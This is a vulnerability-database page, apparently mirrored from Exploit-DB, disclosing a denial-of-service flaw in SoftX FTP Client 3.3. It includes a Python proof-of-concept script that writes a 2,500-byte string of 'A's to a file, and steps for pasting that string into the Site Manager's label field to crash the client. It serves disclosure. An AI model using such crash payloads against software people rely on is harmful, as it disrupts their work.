header-logo
Suggest Exploit
vendor:
SoftX FTP Client
by:
Cemal Cihad ÇIFTÇI
7.5
CVSS
HIGH
DOS
400
CWE
Product Name: SoftX FTP Client
Affected Version From: 3.3
Affected Version To: 3.3
Patch Exists: NO
Related CWE:
CPE: a:softx:ftp_client:3.3
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional Service Pack 3
2018

SoftX FTP Client 3.3 – Denial of Service (PoC)

The SoftX FTP Client 3.3 is vulnerable to a Denial of Service (DoS) attack. By providing a specially crafted payload to the application, an attacker can cause the program to crash, resulting in a denial of service condition. The vulnerability exists due to a lack of proper input validation.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the SoftX FTP Client.
Source

Exploit-DB raw data:

# Exploit Title: SoftX FTP Client 3.3 - Denial of Service (PoC)
# Discovery by: Cemal Cihad ÇİFTÇİ
# Discovery Date: 2018-09-24
# Tested Version: 3.3
# Vulnerability Type: DOS
# Tested on OS: Windows XP Professional Service Pack 3
# Vendor Homepage: www.softx.org
# Download Link: http://www.softx.org/ftp.html

# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "boom.txt". Copy the content of the new file "boom.txt".
# Now start the program. Now when you are inside of the program's Site
# Manager window click "New" > "New Site". In the field: "Site Label" paste
# the copied content from "boom.txt".
# Now click "OK" and see a crash!

#!/usr/bin/python
   
buffer = "A" * 2500

payload = buffer
try:
    f=open("boom.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"